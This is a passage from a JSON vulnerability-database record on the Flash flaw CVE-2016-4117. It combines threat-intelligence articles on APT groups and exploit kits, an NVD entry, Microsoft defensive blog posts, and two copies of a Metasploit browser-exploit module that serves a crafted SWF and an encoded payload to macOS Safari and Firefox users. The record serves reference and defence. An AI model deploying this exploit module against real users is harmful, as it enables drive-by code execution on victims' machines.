"https://threatpost.com/flash-exploit-found-in-seven-exploit-kits/122284/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:18", "description": "Attackers behind advanced persistent threat campaigns have kept busy over the past several months, adding new ways to bypass detection, crafting new payloads to drop, and identifying new zero days and backdoors to help them infect users and maintain persistence on machines.\n\nJuan Andres Guerrero-Saade and Brian Bartholomew, members of Kaspersky Lab\u2019s [Global Research and 
Analysis Team,](<https://securelist.com/apt-trends-report-q2-2017/79332/>) described some of tactics the researchers have seen in Q2 2017 in [a webinar](<https://www.brighttalk.com/webcast/15591/273279>) Tuesday morning. The company used the webinar and [the quarterly report it was based on](<https://securelist.com/apt-trends-report-q2-2017/79332/>) to help pull back the veil on threats previously covered by its private intelligence reporting service.\n\nA chunk of the presentation was spent recapping tweaks recently made by Russian-speaking groups Sofacy and Turla.\n\nSofacy, the group implicated by a December [DHS report](<https://threatpost.com/fbi-dhs-report-links-fancy-bear-to-election-hacks/122802/>) to election hacks, began using two new macro techniques in April. One abused Windows\u2019 certutil utility to extract payloads\u2014the first time the researchers had seen that technique used\u2014another embedded payloads in the EXIF metadata of malicious Office documents.\n\n\u201cAfter we started digging into this we found that they were actually using this technique dating back to December 2016,\u201d Bartholomew said, adding that what made the techniques interesting is that they were used to target French political party members prior to the French election on April 23 and May 7.\n\nIn June, the researchers noticed that Sofacy had updated a payload, written in Delphi, called Zebrocy. The new iteration, version 5.1 of Zebrocy, implemented new encryption keys and minor string obfuscations, something which helps it bypass detection capabilities, Bartholomew said.\n\nBartholomew said the researchers were able to tie Zebrocy to Sofacy in mid-2016.\n\n\u201cThere were some infrastructure ties there,\u201d Bartholomew said, \u201cThere was also another payload called Delphocy that was also written in Delphi. In late 2015 we started seeing Delphi payloads pop up from this group, which we hadn\u2019t seen before. 
We don\u2019t know why that\u2019s the case, it could be that they hired a developer who just refuses to write anything but Delphi. Either way, once Zebrocy was discovered, it was found in parallel to another Sofacy infection, once we started digging into it there was a little bit of shared code in the Delphi\u2014compared to the other Delphocy payload\u2014and ties to the infrastructure to Sofacy.\u201d\n\nEarlier this spring researchers said they were able to make a potential link between Turla, the APT [linked to Moonlight Maze at SAS](<http://the APT linked to Moonlight Maze at SAS earlier this year>) earlier this year, and Sofacy. Like Sofacy was doing around the same time, Turla was spotted using an EPS zero day (CVE-2017-0261) to target foreign ministries and governments.\n\n\u201cWhat\u2019s interesting about that is that it may actually indicate a shared supply chain between Turla and Sofacy,\u201d Bartholomew said.\n\nBartholomew also took time on Tuesday to discuss BlackOasis, a Middle Eastern-speaking group that\u2019s believed to be a client of Gamma Group, the UK-based firm that specializes in surveillance and monitoring equipment, such as FinFisher.\n\nHe claims the group, which he\u2019s spent the better chunk of a year and a half researching, has been spotted using several zero days in the past, including CVE-2016-4117, CVE-2016-0984, and CVE-2015-5119. Bartholomew says that what makes it interesting is that the group was the first seen using CVE-2017-0199, an OLE2Link zero-day, in the wild before it was detected. 
The exploit\u2019s end payload, he adds, is a new variant of FinSpy heavily fortified to prevent analysis by researchers.\n\n\u201cWe\u2019re currently trying to look into that, write some decryptors for it and will probably write another report on that in the next couple of months,\u201d Bartholomew said.\n\nCiting their technical sophistication and development, Guerrero-Saade was eager to discuss a crop of English speaking APT actors, including those behind an Equation Group backdoor, EQUATIONVECTOR. While the backdoor has been around since 2006, Guerrero-Saade said what makes it interesting is the fact that it\u2019s the first example of a NOBUS\u2014NObody But US backdoor\u2014they\u2019ve seen in the wild. The backdoor, a passive and active staging backdoor, could be used to execute shellcode payloads, according to the researcher.\n\nAnother backdoor, Gray Lambert\u2014an extension of the [Lamberts APT](<https://threatpost.com/tools-used-by-lamberts-apt-found-in-vault-7-dumps/124900/>) group\u2014is much more modern implementation, Guerrero-Saade said. It waits, sleeps, and sniffs the network until it\u2019s ready to be used.\n\n\u201cWhat makes this NOBUS backdoor particularly interesting is that it provides attackers with a sort of surgical precision over a network of multiple infected machines,\u201d Guerrero-Saade said. \u201cWith Gray Lambert installed on these machines [attackers] can essentially decide how they\u2019re going to space their payloads, their commands and attacks.\u201d\n\nThe researchers suggest that users should expect more of the same tactics, techniques, and procedures (TTPs) from APT groups going forward. It\u2019s likely countries that have upcoming elections, Germany and Norway for example, will become targets for misinformation campaigns like the one mounted by the Sofacy group. 
Controversial lawful surveillance tools, like those peddled by the Gamma Group to BlackOasis and those sold by the [NSO Group to the Mexican government](<https://threatpost.com/mexican-journalists-lawyers-focus-of-government-spyware/126367/>), will remain popular as well, Guerrero-Saade and Bartholomew said.\n\nThe trend of destructive malware disguised as ransomware will likely continue as well, Guerrero-Saade says, but admits it\u2019s a curious question whether or not the technique will ever be embraced by cybercriminals.\n\n\u201cWe\u2019ve been talking about incompetent people entering the ransomware space for a quite some time now,\u201d Guerrero-Saade said, \u201cWe\u2019re going to see people who are poor coders and won\u2019t even bother to buy an already prepared kit, just essentially trying to leverage something that deletes all the files, or doesn\u2019t do anything but tries to get money out of na\u00efve or unsuspecting victims. The notion of wipers as ransomware is quite different. It\u2019s an interesting phenomenon.\u201d\n\n\u201cSabotage attacks and wiper attacks are a strange occurrence, they don\u2019t happen that often. I think over the past 10 years we\u2019ve looked at 10 cases tops. They\u2019re very rare components. For the most part I think it has to do with the level of access that you\u2019re burning whenever you use them,\u201d Guerrero-Saade said, \u201cIf you\u2019re a cyberespionage actor, if you have access to a network at that point, a Sony or Saudi Aramco, where you can target thousands of machines, the idea of burning that loudly, raising the security profile of the organization as a whole and creating public fallout is extremely costly. 
It\u2019s a strange circumstance where the calculus pays off.\u201d\n\nWhile it may not be a popular technique for cybercriminals on a lower level, Guerrero-Saade said, it\u2019s not out of the realm of possibility for APT gangs to continue to use the vector to create havoc.\n\n\u201cLet\u2019s say we have all the means for a sabotage attack and we want to disguise it as ransomware or as something potentially treatable, it\u2019s not necessarily that different from what the Lazarus Group did with Sony, or some other South Korean targets, where first they asked for money and then dumped data anyways. It\u2019s an evolution that\u2019s particularly troubling,\u201d Guerrero-Saade said.\n", "cvss3": {}, "published": "2017-08-08T16:34:08", "type": "threatpost", "title": "Updates to Sofacy, Turla Highlight 2017 Q2 APT Activity", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-5119", "CVE-2016-0984", "CVE-2016-4117", "CVE-2017-0199", "CVE-2017-0261"], "modified": "2017-08-22T12:54:04", "id": "THREATPOST:BAC3CD99B74F1D6CD22A123ED632AA3F", "href": "https://threatpost.com/updates-to-sofacy-turla-highlight-2017-q2-apt-activity/127297/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2022-03-23T13:51:35", "description": "Adobe Flash Player 21.0.0.226 and earlier allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in May 2016.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-11T01:59:00", "type": "cve", "title": "CVE-2016-4117", "cwe": 
["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4117"], "modified": "2019-02-12T11:29:00", "cpe": ["cpe:/a:adobe:flash_player:21.0.0.226"], "id": "CVE-2016-4117", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4117", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:21.0.0.226:*:*:*:*:*:*:*"]}], "metasploit": [{"lastseen": "2020-10-07T21:18:48", "description": "This module exploits a type confusion on Adobe Flash Player, which was originally found being successfully exploited in the wild. 
This module has been tested successfully on: macOS Sierra 10.12.3, Safari and Adobe Flash Player 21.0.0.182, Firefox and Adobe Flash Player 21.0.0.182.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-21T08:54:35", "type": "metasploit", "title": "Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4117"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/OSX/BROWSER/ADOBE_FLASH_DELETE_RANGE_TL_OP", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion',\n 'Description' => %q(\n This module exploits a type confusion on Adobe Flash Player, which was\n originally found being successfully exploited in the wild. 
This module\n has been tested successfully on:\n macOS Sierra 10.12.3,\n Safari and Adobe Flash Player 21.0.0.182,\n Firefox and Adobe Flash Player 21.0.0.182.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Genwei Jiang', # FireEye original blog details on the vulnerability\n 'bcook-r7' # Imported Metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2016-4117'],\n ['BID', '90505'],\n ['URL', 'https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html'],\n ['URL', 'http://www.securitytracker.com/id/1035826'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa16-02.html'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb16-15.html'],\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'Platform' => ['osx'],\n 'BrowserRequirements' =>\n {\n source: /script|headers/i,\n os_name: lambda do |os|\n os =~ OperatingSystems::Match::MAC_OSX\n end,\n ua_name: lambda do |ua|\n case target.name\n when 'Mac OS X'\n return true if ua == Msf::HttpClients::SAFARI\n return true if ua == Msf::HttpClients::FF\n end\n\n false\n end,\n flash: lambda do |ver|\n case target.name\n when 'Mac OS X'\n return true if Gem::Version.new(ver) <= Gem::Version.new('21.0.0.182')\n end\n\n false\n end\n },\n 'Targets' =>\n [\n [\n 'Mac OS X', {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X64\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2016-04-27',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n @swf = create_swf\n\n super\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"Request: #{request.uri}\")\n\n if request.uri.end_with? 
'swf'\n print_status('Sending SWF...')\n send_response(cli, @swf, 'Content-Type' => 'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache')\n return\n end\n\n print_status('Sending HTML...')\n send_exploit_html(cli, exploit_template(cli, target_info), 'Pragma' => 'no-cache')\n end\n\n def exploit_template(cli, target_info)\n swf_random = \"#{rand_text_alpha(3..7)}.swf\"\n target_payload = get_payload(cli, target_info)\n b64_payload = Rex::Text.encode_base64(target_payload)\n\n if target.name.include? 'osx'\n platform_id = 'osx'\n end\n html_template = %(<html>\n <body>\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\n <param name=\"movie\" value=\"<%=swf_random%>\" />\n <param name=\"allowScriptAccess\" value=\"always\" />\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" />\n <param name=\"Play\" value=\"true\" />\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" Play=\"true\"/>\n </object>\n </body>\n </html>\n )\n\n return html_template, binding\n end\n\n def create_swf\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-4117', 'msf.swf')\n File.binread(path)\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/browser/adobe_flash_delete_range_tl_op.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-17T23:29:00", "description": "This module exploits a type confusion on Adobe Flash Player, which was originally found being successfully exploited in the wild. 
This module has been tested successfully on: macOS Sierra 10.12.3, Safari and Adobe Flash Player 21.0.0.182, Firefox and Adobe Flash Player 21.0.0.182.\n", "cvss3": {}, "published": "2018-12-21T08:54:35", "type": "metasploit", "title": "Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-4117"], "modified": "2021-02-25T16:47:49", "id": "MSF:EXPLOIT/OSX/BROWSER/ADOBE_FLASH_DELETE_RANGE_TL_OP/", "href": "https://www.rapid7.com/db/modules/exploit/osx/browser/adobe_flash_delete_range_tl_op/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion',\n 'Description' => %q(\n This module exploits a type confusion on Adobe Flash Player, which was\n originally found being successfully exploited in the wild. 
This module\n has been tested successfully on:\n macOS Sierra 10.12.3,\n Safari and Adobe Flash Player 21.0.0.182,\n Firefox and Adobe Flash Player 21.0.0.182.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Genwei Jiang', # FireEye original blog details on the vulnerability\n 'bcook-r7' # Imported Metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2016-4117'],\n ['BID', '90505'],\n ['URL', 'https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html'],\n ['URL', 'http://www.securitytracker.com/id/1035826'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa16-02.html'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb16-15.html'],\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'Platform' => ['osx'],\n 'BrowserRequirements' =>\n {\n source: /script|headers/i,\n os_name: lambda do |os|\n os =~ OperatingSystems::Match::MAC_OSX\n end,\n ua_name: lambda do |ua|\n case target.name\n when 'Mac OS X'\n return true if ua == Msf::HttpClients::SAFARI\n return true if ua == Msf::HttpClients::FF\n end\n\n false\n end,\n flash: lambda do |ver|\n case target.name\n when 'Mac OS X'\n return true if Rex::Version.new(ver) <= Rex::Version.new('21.0.0.182')\n end\n\n false\n end\n },\n 'Targets' =>\n [\n [\n 'Mac OS X', {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X64\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2016-04-27',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n @swf = create_swf\n\n super\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"Request: #{request.uri}\")\n\n if request.uri.end_with? 
'swf'\n print_status('Sending SWF...')\n send_response(cli, @swf, 'Content-Type' => 'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache')\n return\n end\n\n print_status('Sending HTML...')\n send_exploit_html(cli, exploit_template(cli, target_info), 'Pragma' => 'no-cache')\n end\n\n def exploit_template(cli, target_info)\n swf_random = \"#{rand_text_alpha(3..7)}.swf\"\n target_payload = get_payload(cli, target_info)\n b64_payload = Rex::Text.encode_base64(target_payload)\n\n if target.name.include? 'osx'\n platform_id = 'osx'\n end\n html_template = %(<html>\n <body>\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\n <param name=\"movie\" value=\"<%=swf_random%>\" />\n <param name=\"allowScriptAccess\" value=\"always\" />\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" />\n <param name=\"Play\" value=\"true\" />\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" Play=\"true\"/>\n </object>\n </body>\n </html>\n )\n\n return html_template, binding\n end\n\n def create_swf\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-4117', 'msf.swf')\n File.binread(path)\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/browser/adobe_flash_delete_range_tl_op.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "mmpc": [{"lastseen": "2017-07-14T04:03:11", "description": "Targeted attacks are typically carried out against individuals to obtain intellectual property and other valuable data from target organizations. These individuals are either directly in possession of the targeted information or are able to connect to networks where the information resides. 
Microsoft researchers have encountered twin threat activity groups that appear to target individuals for reasons that are quite uncommon.\n\nUnlike many activity groups, which typically gather information for monetary gain or economic espionage, PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals. These activity groups are also unusual in that they use the same zero-day exploit to launch attacks at around the same time in the same region. Their targets, however, appear to be individuals that do not share common affiliations.\n\n## Activity group profiles\n\n**PROMETHIUM** is an activity group that has been active as early as 2012. The group primarily uses [Truvasys](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Backdoor:Win32/Truvasys.A!dha>), a first-stage malware that has been in circulation for several years. Truvasys has been involved in several attack campaigns, where it has masqueraded as one of several common computer utilities, including WinUtils, TrueCrypt, WinRAR, or SanDisk. In each of the campaigns, Truvasys malware evolved with additional features\u2014this shows a close relationship between the activity groups behind the campaigns and the developers of the malware.\n\n**NEODYMIUM** is an activity group that is known to use a backdoor malware detected by Microsoft as [Wingbird](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=Backdoor:Win32/Wingbird.A!dha>). This backdoor\u2019s characteristics closely match FinFisher, a government-grade commercial surveillance package. Data about Wingbird activity indicate that it is typically used to attack individual computers instead of networks.\n\n## Similarly timed attacks\n\nIn early May 2016, both PROMETHIUM and NEODYMIUM started conducting attack campaigns against specific individuals in Europe. 
They both used an exploit for [CVE-2016-4117](<https://helpx.adobe.com/security/products/flash-player/apsb16-15.html>), a vulnerability in Adobe Flash Player that, at the time, was both unknown and unpatched.\n\nPROMETHIUM distributed links through instant messengers, pointing recipients to malicious documents that invoked the exploit code to launch Truvasys on victim computers. Meanwhile, NEODYMIUM used well-tailored spear-phishing emails with attachments that delivered the exploit code, ultimately leading to Wingbird\u2019s installation on victim computers.\n\nWhile the use of the same exploit code could be attributed to coincidence, the timing of the campaigns and the geographic location of victims lend credence to the theory that the campaigns are somehow related.\n\n## Stopping exploits in Windows 10\n\nPROMETHIUM and NEODYMIUM both used a zero-day exploit that executed code to download a malicious payload. [Protected view](<https://support.office.com/en-us/article/What-is-Protected-View-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653>), a security feature introduced in Microsoft Office 2010, can prevent the malicious Flash code from loading when the document is opened. [Control Flow Guard](<https://msdn.microsoft.com/en-us/library/windows/desktop/mt637065\\(v=vs.85\\).aspx>), a security feature that is turned on by default in Windows 10 and Microsoft Office 365 64-bit, can stop attempts to exploit memory corruption vulnerabilities. 
In addition, [Credential Guard](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/credential-guard>), an optional feature introduced in Windows 10, can stop Wingbird\u2019s use of the system file, _lsass.exe_, to load a malicious DLL.\n\n## Detecting suspicious behaviors with Windows Defender Advanced Threat Protection\n\n[Windows Defender Advanced Threat Protection](<https://blogs.windows.com/windowsexperience/2016/03/01/announcing-windows-defender-advanced-threat-protection/>) (Windows Defender ATP) is a new built-in service that ships natively with Windows 10 and helps enterprises to detect, investigate and respond to advanced targeted attacks. When activated, it captures behavioral signals from endpoints and then uses cloud-based machine learning analytics and threat intelligence to flag attack-related activities.\n\nWingbird, the advanced malware used by NEODYMIUM, has several behaviors that trigger alerts in Windows Defender ATP. Windows Defender ATP has multiple behavioral and machine learning detection rules that can catch various elements of the malware kill chain. As a result, it can generically detect, without any signature, a NEODYMIUM attack in the following stages:\n\n * Zero-day exploits causing Microsoft Office to generate and execute malicious files\n * Zero-day exploits attempting to grant malicious executables higher privileges\n * Malicious files trying to delete themselves\n * Malicious files attempting the DLL side-loading technique, in which legitimate DLLs in non-standard folders are replaced by malicious ones so that malicious files are loaded by the operating system or by installed applications\n * Malicious files injecting code into legitimate processes\n\nIn the example below, Windows Defender ATP alerts administrators that something is amiss. 
It notifies them that an Office document has dropped an executable file in one of their computers\u2014activity that is very likely part of an attack.\n\n\n\nAdditionally, Windows Defender ATP and Office 365 ATP leverage rules based on IOCs and threat intelligence specific to PROMETHIUM and NEODYMIUM. Alerts from these rules work alongside concise briefs and in-depth profiles provided in the Windows Defender ATP console to help administrators address breach attempts by these activity groups.\n\nFor more information about Windows Defender ATP service in Windows 10, check out [its features and capabilities](<https://www.microsoft.com/en-us/WindowsForBusiness/Windows-ATP>) and read more about why a [post-breach detection approach is a key component of any enterprise security stack.](<http://wincom.blob.core.windows.net/documents/Post%20Breach%20Dealing%20with%20Advanced%20Threats%20Whitepaper.pdf>)\n\nDetails about PROMETHIUM and NEODYMIUM along with indicators of compromise can be found in the Microsoft [Security Intelligence Report volume 21](<https://www.microsoft.com/security/sir/default.aspx>).\n\n \n\n_\\- Windows Defender ATP team_", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-14T18:55:25", "title": "Twin zero-day attacks: PROMETHIUM and NEODYMIUM target individuals in Europe", "type": "mmpc", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4117"], "modified": "2016-12-14T18:55:25", "href": "https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/", "id": "MMPC:AA804B66BAFEF336F846CBD7F0B391A2", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-30T15:02:20", "description": "Despite the disruption of Axpergle (Angler), which dominated the landscape in early 2016, exploit kits as a whole continued to be a threat to PCs running unpatched software. Some of the most prominent threats, from malvertising to ransomware, used exploit kits to infect millions of computers worldwide in 2016.\n\nThe prevalence of exploit kits as an infection vector can be attributed to these factors: 1) they continue to use old but effective exploits while efficiently integrating new ones, 2) they are easily obtained from underground cybercriminal markets; and 3) there remains a significant number of machines that are potentially vulnerable because they run unpatched software.\n\nUsing up-to-date browser and software remains to be the most effective mitigation against exploit kits. Upgrading to the latest versions and enabling automatic updates means patches are applied as soon as they are released.\n\n(Note: This blog post is the first in the 2016 threat landscape review series. In this blog series, we look back at how major areas in the threat landscape, including ransomware, macro malware, support scam malware, and unwanted software, have transformed over the past year. 
We will discuss trends that have emerged, as well as security solutions that tackle threats as they evolve.)\n\n## Meadgive gained ground as Axpergle is disrupted\n\nIn the first five months of 2016, [Axpergle](<https://blogs.technet.microsoft.com/mmpc/tag/axpergle/>) (also known as Angler exploit kit) infected around 100,000 machines monthly. However, sometime in June, the exploit kit vanished. Reports associated this development with the [arrest of 50 hackers in Russia](<http://www.securityweek.com/did-angler-exploit-kit-die-russian-lurk-arrests>).\n\nAxpergle is primarily associated with the delivery of the 32- and 64-bit versions of [Bedep](<https://blogs.technet.microsoft.com/mmpc/2016/04/12/msrt-april-release-features-bedep-detection/>), a backdoor that also downloads more complex and more dangerous malware, such as the information stealers [Ursnif](<https://blogs.technet.microsoft.com/mmpc/tag/ursnif/>) and [Fareit](<https://blogs.technet.microsoft.com/mmpc/tag/win32fareit/>).\n\n\n\n_Figure 1. Monthly encounters by exploit kit family_\n\nThe disappearance of Axpergle made way for other exploit kits as cybercriminals presumably looked for alternatives. The Neutrino exploit kit started dominating for around three months, but scaled down in September. Reports say that Neutrino operators went into \u201cprivate\u201d mode, choosing to cater to select cybercriminal groups.\n\nA look at the year-long trend shows that [Meadgive](<https://blogs.technet.microsoft.com/mmpc/tag/meadgive/>) (also known as RIG exploit kit) filled the hole left by Axpergle and Neutrino (and Nuclear before them). By the end of 2016, while overall volume has gone down, most exploit kit activity can be attributed to Meadgive.\n\nMeadgive has been around since March 2014. Attackers who use Meadgive typically inject a malicious script island into compromised websites. When the compromised site is accessed, the malicious script, which is usually obfuscated, loads the exploit. 
Recently, Meadgive has primarily used an exploit for the Adobe Flash vulnerability CVE-2015-8651 that executes a JavaScript file, which then downloads an encrypted PE file.\n\nEven with the decreased activity, exploit kits continue to be a global threat, having been observed in more than 200 countries in 2016. They affect the following territories the most:\n\n 1. United States\n 2. Canada\n 3. Japan\n 4. United Kingdom\n 5. France\n 6. Italy\n 7. Germany\n 8. Taiwan\n 9. Spain\n 10. Republic of Korea\n\n\n\n_Figure 2. Geographic distribution of exploit kit encounters_\n\n## Exploit kits in the ransomware trail\n\nAs exploit kits have become reliable means to deliver malware, it is not surprising that ransomware, currently the most prevalent malware, continue to use them as launch pads for infection.\n\nMeadgive, for instance, is known for delivering one of the most active ransomware in 2016. As late as December 2016, we documented new [Cerber](<https://blogs.technet.microsoft.com/mmpc/tag/cerber/>) ransomware versions being delivered through a [Meadgive exploit kit campaign](<https://blogs.technet.microsoft.com/mmpc/2016/12/21/no-slowdown-in-cerber-ransomware-activity-as-2016-draws-to-a-close/>), on top of a concurrent spam campaign.\n\nNeutrino, which temporarily dominated in 2016, is associated with another prominent ransomware family. Like Cerber, [Locky](<https://blogs.technet.microsoft.com/mmpc/tag/locky/>) also uses both exploit kits and spam email as vectors. 
With the decreased activity from Neutrino, we\u2019re seeing Locky being distributed more and more through spam campaigns.\n\n**Top malware families associated with exploit kits**\n\n**Malware family** | **Related exploit kit family** \n---|--- \n[Backdoor:Win32/Bedep](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Backdoor:Win32/Bedep>) | Axpergle (Angler) \n[Backdoor:Win64/Bedep](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Backdoor:Win32/Bedep>) | Axpergle (Angler) \n[Ransom:Win32/Cerber](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/Cerber>) | Meadgive (RIG) \n[Ransom:Win32/Locky](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/Locky>) | Neutrino \n[Trojan:Win32/Derbit](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Trojan:Win32/Derbit.A>) | SundownEK \n \n## Integrating exploits at a slower rate\n\nWhile exploit kits rely on exploits for patched vulnerabilities, they also continually update their arsenal with newer exploits in the hope of casting bigger nets. This also allows them to take advantage of the window of opportunity between the release of a security fix and the time it is actually applied by users. Notably, the rate with which exploit kits integrate exploits for newly disclosed 